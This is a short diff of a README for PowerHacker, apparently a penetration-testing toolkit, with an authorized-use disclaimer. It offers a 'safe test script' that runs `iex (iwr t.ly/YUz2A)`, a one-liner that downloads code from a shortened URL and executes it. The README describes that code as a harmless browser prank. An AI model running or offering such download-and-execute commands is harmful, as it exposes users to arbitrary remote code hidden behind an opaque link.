pentestfunctions/powerhacker/README.md

 Security and ethical use are paramount.
 PowerHacker is intended for **authorized penetration testing** and/or **educational purposes only**.
 Misuse of PowerHacker may result in legal consequences.
 Ensure you have explicit permission to test target systems with PowerHacker.

-- Safe test scripts: Try run either of these in a command prompt or powershell respectively:
+## Safe test scripts: Try run either of these in a command prompt or powershell respectively:
+- (It will open your default browser across all your monitors to hypnotoad in kiosk mode)
 1. In Powershell:
   - `iex (iwr t.ly/YUz2A)`